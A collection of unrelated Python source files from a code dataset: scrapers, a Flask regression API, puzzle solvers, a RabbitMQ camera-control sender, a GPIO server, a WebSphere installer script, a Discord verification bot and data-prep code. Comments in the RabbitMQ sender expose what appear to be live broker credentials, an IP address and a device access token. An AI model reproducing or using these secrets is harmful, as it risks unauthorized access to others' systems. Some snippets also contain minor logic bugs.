f.read().split('\\n')\n\t\n\tif(len(sys.argv) == 1):\n\t\tn_regulars = 1\n\t\tn_irregulars = 3\n\t\tn_data = 2\n\tif((len(sys.argv) == 2) | (len(sys.argv) == 3) | (len(sys.argv) > 4)):\n\t\t\"Please include number of regular sources and number of irregular sources you would like to see.\"\n\t\t\"For example, python main.py 2 4 will retrieve 2 regular and 4 irregular sources\"\n\t\t\"Passing no arguments will use 1 regular and 3 irregular sources\"\n\tif(len(sys.argv) ==4):\n\t\tn_regulars = sys.argv[1]\n\t\tn_irregulars = sys.argv[2]\n\t\tn_data = sys.argv[3]\n\n\tregular_open_list = random.sample(regular_list, n_regulars)\n\tirregular_open_list = random.sample(irregular_list, n_irregulars)\n\tdata_open_list = random.sample(data_list, n_data)\n\n\tfor regular in regular_open_list:\n\t\twebbrowser.open_new(regular)\n\ttime.sleep(0.1)\n\tfor irregular in irregular_open_list:\n\t\twebbrowser.open_new_tab(irregular)\n\ttime.sleep(0.1)\n\tfor data in data_open_list:\n\t\twebbrowser.open_new_tab(data)","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1231,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"431940206","text":"import requests\nfrom parsel import Selector\nimport csv\nimport traceback\n\n\nclass Parser:\n def __init__(self):\n self.base_url = \"https://trade-example.com/\"\n self.r = requests.Session()\n self.headers = {\n 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5) AppleWebKit/537.36 (KHTML, like Gecko) ' +\n 'Chrome/86.0.4240.183 Safari/537.36'\n }\n\n def get_stocks(self):\n portlist = []\n page = self.get(self.base_url)\n trs = Selector(page.text).css('tr').getall()\n\n for tr in trs:\n symbol_match = Selector(tr).css('td:nth-child(2) div span::text')\n rating_match = Selector(tr).css('td:nth-child(6) div div').re(r'(\\d+)%')\n if len(symbol_match) == 1 and len(rating_match) == 1:\n symbol = symbol_match.getall()[0]\n rating = rating_match[0]\n if int(rating_match[0]) >= 80:\n print(symbol, rating)\n portlist.append([symbol])\n\n file = open('result.csv', 'w')\n with file:\n writer = csv.writer(file)\n writer.writerow(['portlist'])\n writer.writerows(portlist)\n\n def get(self, url):\n page = self.r.get(url, headers=self.headers)\n if page.status_code != 200:\n print(page.status_code, url)\n exit(1)\n\n return page\n\n\nif __name__ == '__main__':\n result = {'result': True}\n\n try:\n Parser = Parser()\n\n Parser.get_stocks()\n\n except Exception as e:\n raise\n except KeyError:\n f = open(\"error.txt\", \"w\")\n f.write(traceback.format_exc())\n f.close()\n pass\n","sub_path":"trade.py","file_name":"trade.py","file_ext":"py","file_size_in_byte":1704,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"306009341","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Nov 7 11:31:36 2020\n\n@author: Zsombi\n\"\"\"\n\nimport flask\nfrom flask import request, jsonify\nimport pandas as pd\nimport numpy as np\nfrom sklearn.linear_model import LinearRegression\nimport json\n\nclass NumpyEncoder(json.JSONEncoder):\n def default(self, obj):\n if isinstance(obj, np.ndarray):\n return obj.tolist()\n return json.JSONEncoder.default(self, obj)\n\ndef runHeuristics(data):\n x = data[['volume','fragility_rate','hazard_classification','isCooled']]\n y = data['cost']\n \n reg = LinearRegression()\n reg.fit(x,y)\n \n return {\n \"intercept\": reg.intercept_,\n \"coefArr\": reg.coef_\n }\n\napp = flask.Flask(__name__)\napp.config[\"DEBUG\"] = True\n\n\n@app.route('/', methods=['POST'])\ndef home():\n data = request.get_json();\n dfItem = pd.DataFrame.from_records(data)\n json_response = json.dumps(runHeuristics(dfItem), cls=NumpyEncoder)\n return json_response\n\napp.run(debug=False)","sub_path":"Heuristics/generator/modules/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":988,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"485331729","text":"from getinput import get_input\nfrom pairs import dist_L1, Direction, add_pair, diag_adjacents\nimport itertools\nimport unittest\n\n\ndef get_coords(idx):\n n = 1\n while True:\n if n**2 > idx:\n break\n n += 2\n diff = n**2 - idx\n k = (n - 1) // 2\n # South side\n if (diff // (n-1)) == 0:\n return k - diff, -k\n # West side\n elif (diff // (n-1)) == 1:\n return -k, -k + (diff - (n-1))\n # North side\n elif (diff // (n-1)) == 2:\n return -k + (diff - 2*(n-1)), k\n # East side\n elif (diff // (n-1)) == 3:\n return k, k - (diff - 3*(n-1))\n\n\ndef sum_adjacent(loc, spiral):\n total = 0\n for offset in diag_adjacents:\n neighbor = add_pair(loc, offset)\n if neighbor in spiral:\n total += spiral[neighbor]\n return total\n\n\ndef part_1(square):\n return dist_L1((0, 0), get_coords(square))\n\n\ndef get_first_higher_than(square):\n depth = 1\n spiral = {(0, 0): 1}\n while True:\n # Go up\n for y in range(-depth+1, depth+1):\n val = sum_adjacent((depth, y), spiral)\n if val > square:\n return val, spiral\n spiral[(depth, y)] = val\n # Go left\n for x in range(depth-1, -(depth+1), -1):\n val = sum_adjacent((x, depth), spiral)\n if val > square:\n return val, spiral\n spiral[(x, depth)] = val\n # Go down\n for y in range(depth-1, -(depth+1), -1):\n val = sum_adjacent((-depth, y), spiral)\n if val > square:\n return val, spiral\n spiral[(-depth, y)] = val\n # Go right\n for x in range(-depth+1, depth+1):\n val = sum_adjacent((x, -depth), spiral)\n if val > square:\n return val, spiral\n spiral[(x, -depth)] = val\n depth += 1\n\n\ndef part_2(square):\n return get_first_higher_than(square)[0]\n\n\ndef main():\n input_str = int(get_input(3))\n print('Part 1:', part_1(input_str))\n print('Part 2:', part_2(input_str))\n\n\nclass TestSpiral(unittest.TestCase):\n def test_get_coords(self):\n self.assertEqual((1, 1), (get_coords(3)))\n self.assertEqual((-1, 2), get_coords(16))\n self.assertEqual((-2, -2), get_coords(21))\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"2017/day3.py","file_name":"day3.py","file_ext":"py","file_size_in_byte":2319,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"27783651","text":"#!/usr/bin/env python\nimport pika\nimport json\nfrom time import sleep\nimport sys\n\n# ./ezviz records get 1 2019-05-30\\ 00:00:00 2019-05-30\\ 09:00:00 C90674290 WGXWZT a287e05ace374c3587e051db8cd4be82 at.bg2xm8xf03z5ygp01y84xxmv36z54txj-4n5jmc9bua-0iw2lll-qavzt882f\nparameters = pika.URLParameters(\"amqp://guest:guest@192.168.1.102\") #amqp://ilabservice:iLabServiceOps123456@40.73.40.246:5672/\nconnection = pika.BlockingConnection(parameters)\nchanPlay = connection.channel()\nchanPlay.exchange_declare(exchange=\"ezviz.exchange.rtplay\", exchange_type=\"direct\")\n\n# args = {\"x-max-priority\": 10}\n# args[\"x-expires\"] = 10 * 1000\nchanPlay.queue_declare(queue='ezviz.work.queue.rtplay', durable=False)\n\nchanPlay.queue_bind(exchange=\"ezviz.exchange.rtplay\",\n queue='ezviz.work.queue.rtplay', routing_key='rtplay')\n\nchanStop = connection.channel()\nchanStop.exchange_declare(exchange=\"ezviz.exchange.rtplay\", exchange_type=\"direct\")\n\n# args = {\"x-max-priority\": 10}\n# args[\"x-expires\"] = 10 * 1000\nchanStop.queue_declare(queue='ezviz.work.queue.rtstop_', durable=False)\n\nchanStop.queue_bind(exchange=\"ezviz.exchange.rtplay\",\n queue='ezviz.work.queue.rtstop_', routing_key='rtstop_')\n\nbody = {}\nbody[\"cmd\"] = \"rtstop\"\nbody[\"chanId\"] = 1\nbody[\"devSn\"] = \"C90843626\" #\"C90842467\" #\"C90842444\" #\"C90843626\" #\"C90842444\" #\"C90843484\"\nbody[\"devCode\"] = \"bcd\"\nbody[\"uuid\"] = \"abcd\"\nbody[\"quality\"] = 0\n\n\nbody[\"devSn\"] = sys.argv[1]\n\nif sys.argv[2] == \"rtplay\":\n body[\"cmd\"] = \"rtplay_continue\"\n body[\"duration\"] = 30*60\n chanPlay.basic_publish(exchange='ezviz.exchange.rtplay', routing_key='rtplay', body= json.dumps(body))\nelse:\n body[\"cmd\"] = \"rtstop\"\n chanStop.basic_publish(exchange='ezviz.exchange.rtplay', routing_key='rtstop_', body= json.dumps(body))\n\n\n\nprint(\" [x] Sent \" + json.dumps(body))\nconnection.close()\n","sub_path":"scripts/sender_local.py","file_name":"sender_local.py","file_ext":"py","file_size_in_byte":1858,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"574293558","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: /home/cer/Project/pycharm/paper_manager/paper_manager/repository.py\n# Compiled at: 2018-04-14 05:20:12\n\n\nclass Repository:\n\n def __init__(self, name, path, support_suffix=None):\n \"\"\"\n :param name: name of the repository\n :param path: absolute path of the repository\n :param support_suffix: support suffix of this repository\n \"\"\"\n self.name = name\n self.path = path\n if support_suffix is None:\n self.support_suffix = [\n 'pdf']\n else:\n self.support_suffix = support_suffix\n return","sub_path":"pycfiles/paper_manager-2.0-py2.7/repository.py","file_name":"repository.py","file_ext":"py","file_size_in_byte":744,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"232643638","text":"a = int(input(\"请输入数字:\"))\n\nb = 0# 偶数和\nc = 0# 奇数和\ni = 0\nwhile i < a:\n\tprint(\"当前数字:%d\"%i)\n\ti+=1\n\tif i % 2 == 0:\n\t\tb = b + i\n\telif i % 2 != 0:\n\t\tc = c + i\n\nprint(\"偶数和为:%d\"%b)\nprint(\"奇数和为:%d\"%c)\nprint(\"总和为%d\"%(b+c))\n","sub_path":"08day/6-奇偶数分别求和.py","file_name":"6-奇偶数分别求和.py","file_ext":"py","file_size_in_byte":263,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"507967288","text":"import matplotlib.pyplot as plt\n\nf=open('Back_Die_Away.csv','r')\ndata=f.readlines()\nf.close()\ntime=[]\ncounts=[]\n\nfor i in range(75,len(data)):\n line=data[i].split(sep=',')\n if float(line[0])<20000:\n counts.append(float(line[0]))\n time.append(float(line[1].split(sep='\\n')[0]))\nplt.plot(time,counts)\nplt.xlabel('Time(s)')\nplt.ylabel('Count rate (cps)')\nplt.savefig('Back.png',dpi=600)\nplt.show()\n\n","sub_path":"Back_Plot.py","file_name":"Back_Plot.py","file_ext":"py","file_size_in_byte":416,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"95773667","text":"import json\nimport os\n\nfrom autobahn.asyncio.wamp import ApplicationSession\nimport inotify.adapters\nfrom inotify.constants import IN_CLOSE_WRITE\n\nfrom pigpio.backend.controller import gpio\n\nDIR_CONTROLLER = '/sys/class/gpio'\nDIR_PIN = os.path.join(DIR_CONTROLLER, 'gpio{}')\nBCM_PINS = [4, 5, 6, 12, 13, 16, 17, 19, 20, 21, 22, 23, 24, 25, 26, 27]\nPINS_PATH = [DIR_PIN.format(pin).encode() for pin in BCM_PINS]\n\n\nclass GPIOPinServer(ApplicationSession):\n def __init__(self, config=None):\n self.event_notifier = inotify.adapters.Inotify()\n for path in PINS_PATH:\n if os.path.exists(path):\n self._setup_initial_state(path)\n self.event_notifier.add_watch(path, mask=IN_CLOSE_WRITE)\n super().__init__(config)\n\n @staticmethod\n def _setup_initial_state(path):\n decoded_path = path.decode()\n with open(os.path.join(decoded_path, 'direction'), 'w') as f:\n f.write('out')\n with open(os.path.join(decoded_path, 'value'), 'w') as f:\n f.write('1')\n\n @staticmethod\n def process_event_and_get_data(event):\n gpio_path = event[2].decode()\n changed_file = event[3].decode()\n with open(os.path.join(gpio_path, changed_file), 'r') as f:\n value = f.read().strip()\n data = {\n 'pin': int(gpio_path.split('/')[-1].replace('gpio', '')),\n 'file': changed_file,\n 'value': value\n }\n return json.dumps(data)\n\n def publish_gpio_events(self):\n import threading\n threading.Thread(target=self._publish_gpio_events).start()\n\n def _publish_gpio_events(self):\n for event in self.event_notifier.event_gen():\n if event:\n self.publish(\n u'pigpio.gpio_update',\n self.process_event_and_get_data(event)\n )\n\n @staticmethod\n def _get_state(*args, **kwargs):\n state = gpio.get_state(*args, **kwargs)\n return json.dumps({'state': state})\n\n async def onJoin(self, details):\n await self.register(gpio.set_state, u'pigpio.set_state')\n await self.register(self._get_state, u'pigpio.get_state')\n self.publish_gpio_events()\n","sub_path":"pigpio/server/gpio_pin_server.py","file_name":"gpio_pin_server.py","file_ext":"py","file_size_in_byte":2228,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"413907089","text":"import unyt as u\nimport numpy as np\nimport pandas as pd\n\nfrom mosdef_cassandra.analysis import ThermoProps\n\n\ndef main():\n\n # Systems simulated\n pore_area = 2 * 22.104 * 21.270 * u.angstrom**2 # From .inp file\n pore_sizes = [1.0, 1.5, 2.0] * u.nm\n n_ion_pairs = [0, 4, 8]\n\n # Output\n nmols_list = []\n pore_sizes_list = []\n n_ion_pair_list = []\n\n for pore_size in pore_sizes:\n for n_ion_pair in n_ion_pairs:\n thermo_path = f\"../gcmc_pore/{pore_size.to_value('nm')}nm_{n_ion_pair}pairs/gcmc.out.prp\"\n thermo = ThermoProps(thermo_path)\n nmols_list.append(thermo.prop(\"Nmols_4\", start=20000000).mean())\n pore_sizes_list.append(pore_size)\n n_ion_pair_list.append(n_ion_pair)\n\n df = pd.DataFrame(\n columns=[\"pore_size_nm\", \"n_ion_pairs\", \"nmols\", \"nmols_per_nm^2\"]\n )\n df[\"pore_size_nm\"] = np.array(pore_sizes_list)\n df[\"n_ion_pairs\"] = np.array(n_ion_pair_list)\n df[\"nmols\"] = np.array(nmols_list)\n df[\"nmols_per_nm^2\"] = np.array(nmols_list) / pore_area.to_value(u.nm**2)\n df.to_csv(\"results_gcmc_pore.csv\")\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"mc_examples/realistic_workflows/graphene_slitpore/analysis/analyze_gcmc_pore.py","file_name":"analyze_gcmc_pore.py","file_ext":"py","file_size_in_byte":1160,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"61458989","text":"''' \n Licensed Materials - Property of IBM\n 5725-B69 5655-Y17 5655-Y31\n Copyright IBM Corp. 1987, 2014. All Rights Reserved.\n \n Note to U.S. Government Users Restricted Rights: \n Use, duplication or disclosure restricted by GSA ADP Schedule \n Contract with IBM Corp.\n'''\nimport Application\nimport Common\n\nglobal AdminApp\nglobal AdminConfig\nglobal AdminControl\n\n\nclass RTS(Application.Application):\n \n def __init__(self, cellName, nodeName, serverName, applicationName):\n Application.Application.__init__(self, cellName, nodeName, serverName, applicationName)\n #endDef \n \n \n #endDef\n \n def install(self, modulePath):\n modtovh1 = [\"teamserver\", 'teamserver.war,WEB-INF/web.xml', 'default_host']\n modtovh2 = [\"decisioncenter\", 'decisioncenter.war,WEB-INF/web.xml', 'default_host']\n modtovh = [modtovh1,modtovh2]\n\n rolesToUserMap = [\n [\"rtsUser\", \"No\", \"No\", \"\", \"rtsUser\"],\n [\"rtsAdministrator\", \"No\", \"No\", \"\", \"rtsAdministrator\"],\n [\"rtsConfigManager\", \"No\", \"No\", \"\", \"rtsConfigManager\"],\n [\"rtsInstaller\", \"No\", \"No\", \"\", \"rtsInstaller\"],\n [\"administrator\", \"No\", \"No\", \"\", \"administrator\"],\n [\"testedGroup\", \"No\", \"No\", \"\", \"testedGroup\"],\n [\"definedGroup\", \"No\", \"No\", \"\", \"definedGroup\"],\n [\"newGroup\", \"No\", \"No\", \"\", \"newGroup\"],\n [\"author\", \"No\", \"No\", \"\", \"author\"],\n [\"refusedGroup\", \"No\", \"No\", \"\", \"refusedGroup\"],\n [\"reviewedGroup\", \"No\", \"No\", \"\", \"reviewedGroup\"],\n [\"reviewer\", \"No\", \"No\", \"\", \"reviewer\"],\n [\"deprecatedGroup\", \"No\", \"No\", \"\", \"deprecatedGroup\"],\n [\"tester\", \"No\", \"No\", \"\", \"tester\"],\n [\"rmtUserGroup\", \"No\", \"No\", \"\", \"rmtUserGroup\"],\n [\"inactiveGroup\", \"No\", \"No\", \"\", \"inactiveGroup\"],\n [\"Validator\", \"No\", \"No\", \"\", \"Validator\"],\n [\"Eligibility\", \"No\", \"No\", \"\", \"Eligibility\"],\n [\"deployer\", \"No\", \"No\", \"\", \"deployer\"],\n [\"deployedGroup\", \"No\", \"No\", \"\", \"deployedGroup\"]\n ]\n\n mapref7 = [\"teamserver\", \"\", \"teamserver.war,WEB-INF/web.xml\", \"jdbc/serverextendedbrm\", \"javax.sql.DataSource\", \"jdbc/serverextendedbrm\"]\n mapref8 = [\"teamserver\", \"\", \"teamserver.war,WEB-INF/web.xml\", \"jdbc/serverworkflow\", \"javax.sql.DataSource\", \"jdbc/serverworkflow\"]\n mapref = [mapref7, mapref8]\n\n\n attrs = ['-MapWebModToVH', modtovh, '-MapResRefToEJB', mapref, '-cell', self.cellName, '-node', self.nodeName, '-server', self.serverName,\n '-appname', self.applicationName, '-MapRolesToUsers' , rolesToUserMap ]\n\n AdminApp.install(modulePath, attrs)\n Common.isolateClassLoader(self.applicationName)\n Common.setCookiePath(self.applicationName, '/teamserver')\n\n # Defect 60186: In Enterprise Applications > teamserver-WAS85 > Manage Modules > decisioncenter.war > Session management,\n # In General Properties, check \"Override session management\" and uncheck \"Security integration\"\n deployments = AdminConfig.getid('/Deployment:teamserver-WAS85')\n appDeploy = AdminConfig.showAttribute(deployments, 'deployedObject')\n mod1 = AdminConfig.showAttribute(appDeploy, 'modules')\n\n kuki = ['maximumAge', 1000]\n cookie = [kuki]\n cookieSettings = ['defaultCookieSettings', cookie]\n tuningParmsDetailList = [[\"allowOverflow\", \"true\"], [\"invalidationTimeout\", \"30\"], [\"maxInMemorySessionCount\", \"1000\"]]\n tuningParamsList = ['tuningParams', tuningParmsDetailList]\n sessionManagerDetailList = [[\"enableSecurityIntegration\", \"false\"], [\"maxWaitTime\", \"0\"], [\"allowSerializedSessionAccess\", \"false\"], [\"enableProtocolSwitchRewriting\", \"false\"] ,[\"enableUrlRewriting\", \"false\"], [\"enable\", \"true\"], [\"accessSessionOnTimeout\", \"true\"], [\"enableSSLTracking\", \"false\"], [\"enableCookies\", \"true\"], tuningParamsList, cookieSettings]\n sessionMgr = ['sessionManagement', sessionManagerDetailList]\n id = AdminConfig.create('ApplicationConfig', appDeploy,[sessionMgr], 'configs')\n targetMappings = AdminConfig.showAttribute(appDeploy, 'targetMappings')\n targetMappings = targetMappings[1:len(targetMappings)-1]\n attrs = ['config', id]\n AdminConfig.modify(targetMappings,[attrs])\n\n nameAttr = ['name', 'myWebModuleConfig']\n descAttr = ['description', \"Web Module config post create\"]\n webAttrs = [nameAttr, descAttr, sessionMgr]\n\n arrayModules = mod1[1:len(mod1)-1].split(\" \")\n for module in arrayModules:\n if module.find('WebModuleDeployment') != -1:\n moduleConfig = AdminConfig.create('WebModuleConfig', module, webAttrs)\n attrs = ['config', moduleConfig]\n targetMappings = AdminConfig.showAttribute(appDeploy, 'targetMappings')\n targetMappings = targetMappings[1:len(targetMappings)-1].split(\" \")\n for target in targetMappings:\n if target.find('DeploymentTargetMapping') != -1:\n attrs = ['config', moduleConfig]\n AdminConfig.modify(target,[attrs])\n\n # EndDef\n","sub_path":"Personalization/jython/RTS.py","file_name":"RTS.py","file_ext":"py","file_size_in_byte":5595,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"585311159","text":"df_dropped = df.copy()\ndf_dropped.dropna(inplace = True)\n\ndef sparse(df_series, sparse_value, lt = None, gt = None, eq = None):\n counts = df_series.value_counts()\n if eq != None:\n idx = counts[counts.eq(eq)].index\n df_series.loc[df_series.isin(idx)] = f'sparse{sparse_value}'\n return df_series\n elif lt != None and gt == None:\n idx = counts[counts.lt(lt)].index\n df_series.loc[df_series.isin(idx)] = f'sparse{sparse_value}'\n return df_series\n elif lt == None and gt != None:\n idx = counts[counts.gt(gt)].index\n df_series.loc[df_series.isin(idx)] = f'sparse{sparse_value}'\n return df_series\n elif lt != None and gt != None:\n idx = counts[counts.lt(lt) & counts.gt(gt)].index\n df_series.loc[df_series.isin(idx)] = f'sparse{sparse_value}'\n return df_series\n else:\n print('To recategorize sparse categories, define arguments for lt, gt, or eq.')\n\ndf_dropped['len_listing'] = df_dropped['name'].map(lambda x: len(x))\n\ndf_dropped['year_review_last'] = df_dropped.last_review.map(lambda x: x.split('-')[0])\ndf_dropped['year_review_fix'] = sparse(df_dropped.year_review_last, 1, lt = 26)\ndf_dropped['year_review_fix'] = df_dropped['year_review_fix'].astype(str)\n\ndf_dropped = df_dropped[df_dropped.price != 0]\ndf_price_limit = df_dropped.loc[df_dropped['price'] < 1500]\ndf_price_limit['lprice'] = np.log(df_price_limit.price)\n\ndef binning(i):\n if i > 7 and i < 15:\n return '2wks'\n elif i > 14 and i < 22:\n return '3wks'\n elif i > 21 and i < 32:\n return '1month'\n elif i > 31:\n return 'more_than_month'\n else:\n return i\n\ndf_price_limit['min_night_bins'] = df_price_limit.minimum_nights.apply(binning)\ndf_price_limit.min_night_bins = df_price_limit.min_night_bins.astype(str)\n\ndf_mod = df_price_limit.drop(['price', 'id', 'name', 'host_id', 'host_name', \n 'neighbourhood', 'latitude', 'longitude', 'last_review', 'year_review_last'], axis = 1)\n\nX = df_mod.drop('lprice', axis = 1)\ny = df_mod.lprice\n","sub_path":"Python_files/data_prep.py","file_name":"data_prep.py","file_ext":"py","file_size_in_byte":2073,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"641541883","text":"import numpy\nimport math\nfrom objects.AbstractBase import AbstractShape\nfrom objects.MobileRobot import MobileRobot\nfrom resources.GlobalSharedData import GlobalSharedData as gShare\n\n\nclass TargetPoint(AbstractShape):\n \"\"\"\n Klasa punktu docelowego do którego zmierza robot\n \"\"\"\n\n def __init__(self, sharedData: gShare, position_x, position_y):\n \"\"\"\n Konstruktor klasy TargetPoint\n :param sharedData: Klasa zawierająca wspólne dane\n :param position_x: Położenie poziome przeszkody\n :param position_y: Położenie pionowe przeszkody\n \"\"\"\n self.sharedData = sharedData\n self.position_x = position_x\n self.position_y = position_y\n self.radius = self.sharedData.targetPointDrawingSize\n\n def attach_to_canvas(self, canvas: type) -> None:\n self.canvas = canvas\n self.objectId = canvas.create_oval(\n self.position_x - self.radius,\n self.position_y - self.radius,\n self.position_x + self.radius,\n self.position_y + self.radius,\n fill=self.sharedData.targetPointColor\n )\n self.backgroundImageArray = numpy.zeros((2 * self.sharedData.canvasHeight, 2 * self.sharedData.canvasWidth))\n self.createFieldImage()\n\n def move(self) -> None:\n # Założono, że pozycja docelowa się nie porusza\n return\n\n def generateField(self, x: float, y: float) -> float:\n distance = {self.sharedData.potentialFieldChoices[0]: self.conicalPotentialField(x, y),\n self.sharedData.potentialFieldChoices[1]: self.parabolicPotentialField(x, y),\n self.sharedData.potentialFieldChoices[2]: self.harmonicPotentialField(x, y),\n \"Wybierz metodę wyznaczania pola potencjalnego\": 0\n }[self.sharedData.potentialField.get()]\n return distance\n\n def createFieldImage(self) -> None:\n for xIndex in range(2 * self.sharedData.canvasWidth):\n for yIndex in range(2 * self.sharedData.canvasHeight):\n self.backgroundImageArray[yIndex, xIndex] = self.generateField(\n xIndex - self.sharedData.canvasWidth + self.position_x,\n yIndex - self.sharedData.canvasHeight + self.position_y\n )\n\n def conicalPotentialField(self, x: float, y: float) -> float:\n \"\"\"\n Funkcja wyznaczająca wartość stożkowego pola potencjalnego w wybranym punkcie\n :param x: Współrzędna x\n :param y: Współrzędna y\n :return: Wartość pola potencjalnego\n \"\"\"\n distance = math.sqrt((x - self.position_x) ** 2 + (y - self.position_y) ** 2)\n return self.sharedData.targetPointPotentialMultiplayer * distance\n\n def parabolicPotentialField(self, x: float, y: float) -> float:\n \"\"\"\n Funkcja wyznaczająca wartość parabolicznego pola potencjalnego w wybranym punkcie\n :param x: Współrzędna x\n :param y: Współrzędna y\n :return: Wartość pola potencjalnego\n \"\"\"\n distance = math.sqrt((x - self.position_x) ** 2 + (y - self.position_y) ** 2)\n return (distance**2) * self.sharedData.targetPointPotentialMultiplayer / 2\n \n def harmonicPotentialField(self, x: float, y: float) -> float:\n \"\"\"\n Funkcja wyznaczająca wartość harmonicznego pola potencjalnego (z uwzględnieniem przepływu równomiernego) w wybranym punkcie\n :param x: Współrzędna x\n :param y: Współrzędna y\n :return: Wartość pola harmonicznego\n \"\"\"\n startX = 0\n startY = 0\n\n for objectInArray in self.sharedData.objectsArray:\n if isinstance(objectInArray, MobileRobot):\n startX = objectInArray.position_x\n startY = objectInArray.position_y\n\n distance = math.sqrt((x - self.position_x) ** 2 + (y - self.position_y) ** 2)\n\n distance = distance + 0.1\n\n alfa = math.atan2((self.position_y - y), (self.position_x - x))\n\n if self.sharedData.enableUniformFlowFlag:\n return self.sharedData.targetPointPotentialMultiplayer*(math.log(distance)) -((x - startX)*math.cos(alfa)+(y - startY)*math.sin(alfa))\n else:\n return self.sharedData.targetPointPotentialMultiplayer*(math.log(distance))\n\n def checkUpdateTargetPoint(self) -> None:\n \"\"\"\n FIX - funkcja łącząca pozycję obiektu ze strukturą danych\n :return: None\n \"\"\"\n if self.position_y != self.sharedData.targetPointY or self.position_x != self.sharedData.targetPointX:\n self.position_x = self.sharedData.targetPointX\n self.position_y = self.sharedData.targetPointY\n self.canvas.coords(\n self.objectId,\n self.position_x - self.radius,\n self.position_y - self.radius,\n self.position_x + self.radius,\n self.position_y + self.radius,\n )\n","sub_path":"objects/TargetPoint.py","file_name":"TargetPoint.py","file_ext":"py","file_size_in_byte":4990,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"182619575","text":"import re\n\nimport sys\nsys.path.append(\"..\")\nsys.path.append(\"../..\")\n\nimport DGUtils\n\npath = \"SetFile/eg.xls\"\n\nlist01 = DGUtils.read_excel(path)\n# listStr = str(list01)\n\n# list02 = listStr.split(\"活动\")\n\nfor i in range(0,len(list01)):\n # list01[i] = re.sub(r'活动[0-9]+',\"分割线\",str(list01[i]))\n if len(re.findall(r'活动[0-9]+',str(list01[i]))) > 0:\n list01.insert(i, \"==================\") \n\n \n # print(i)\n# list02 = re.split(\"分割线\", str(list01))\n# for i in list02:\n# print(i)\n\nfor i in list01:\n print(i)","sub_path":"DGame/StartServerTimeDemo02/Code/demo_01.py","file_name":"demo_01.py","file_ext":"py","file_size_in_byte":545,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"437451789","text":"import discord\nfrom checker import check\nfrom discordvars import guild, verify, role1, role2, log\n\nf = open(\"token.txt\", \"r\")\ntoken = f.readline()\n\nclient = discord.Client()\n\n@client.event\nasync def on_ready():\n print(\"Logged in as:\", client.user)\n\n@client.event\nasync def on_message(message):\n guild = client.get_guild(guild)\n if message.author != client.user:\n if message.channel.id == verify:\n print(message.content)\n splitter = message.content.split()\n roll = splitter[-1]\n name = \" \".join(splitter[:-1])\n channel = client.get_channel(log)\n if check(name, roll):\n await channel.send(f\"Name: {name}\\nRoll:{roll}\\nRegistered!\\nReference User: <@{message.author.id}>\")\n await message.author.add_roles(guild.get_role(role1))\n await message.author.add_roles(guild.get_role(role2))\n else:\n await channel.send(f\"Name: `{name}` and Roll: `{roll}` unmatched\\nReference User: <@{message.author.id}>\")\n await message.delete()\n\nclient.run(token)","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1101,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"311821084","text":"import os\nimport random\nfrom abc import ABC, abstractmethod\n\nimport numpy as np\n\nimport torch.utils.data as data\nfrom PIL import Image\nimport torchvision.transforms as transforms\n\nfrom core.dataset.base_dataset import BaseDataset\nfrom core.dataset.functionals.frame_loaders import (\n\tVideoMetadata,\n\tgenerate_video_indices,\n\tload_video_frames\n)\nfrom core.dataset.functionals import (\n\tcheck_filepath,\n\tread_strip_split_lines\n)\nfrom core.dataset.functionals.transforms import get_transform\n\n\nclass TemporalDataset(BaseDataset):\n\t\"\"\"Temporal (action) dataset\n\n\tTemporal dataset from video frames which support loading data from pre-processed video frames.\n\tTemporal dataset has new channel length that comes from stacking images ordered chronogically.\n\tThe channel axis represent time series.\n\n\tTemporal action frames initially take image of extension .jpg, .png, .jpeg, etc. \n\tThey represent frames taken from video.\n\t\n\tThe metadata for this dataset, also called split file, contains three columns:\n\t\t... folder path, num_frames, and labels\n\t\"\"\"\n\n\tdef __init__(self, opts, phase='train'):\n\t\t\"\"\"Initialize the class; save the options in the class\n\n\t\tParameters:\n\t\t\topts (Option class)-- stores all the experiment flags; needs to be a subclass of BaseOptions\n\t\t\tphase (str)-- specify if this dataset loader is used for [train | val | test]\n\t\t\"\"\"\n\t\tself.opts = opts\n\t\tself.phase = phase\n\t\tself.configure_dataset_settings(opts)\n\t\tself.setup_metadata(opts)\n\n\t\t# configure image property\n\t\tself.group_transforms = get_transform(opts)\n\n\tdef configure_dataset_settings(self, opts):\n\t\t# Configs for input video\n\t\tself.modality = opts.modality\n\t\tself.n_segments = opts.n_segments\t\t\t# segment video to n_segment\n\t\tself.sample_length = opts.sample_length\t\t# sample length per segment\n\t\tself.random_shift = opts.random_shift\n\n\t\t# Configs for image file naming\n\t\tself.image_extension = opts.img_ext\n\n\t\tif self.modality in ['RGB', 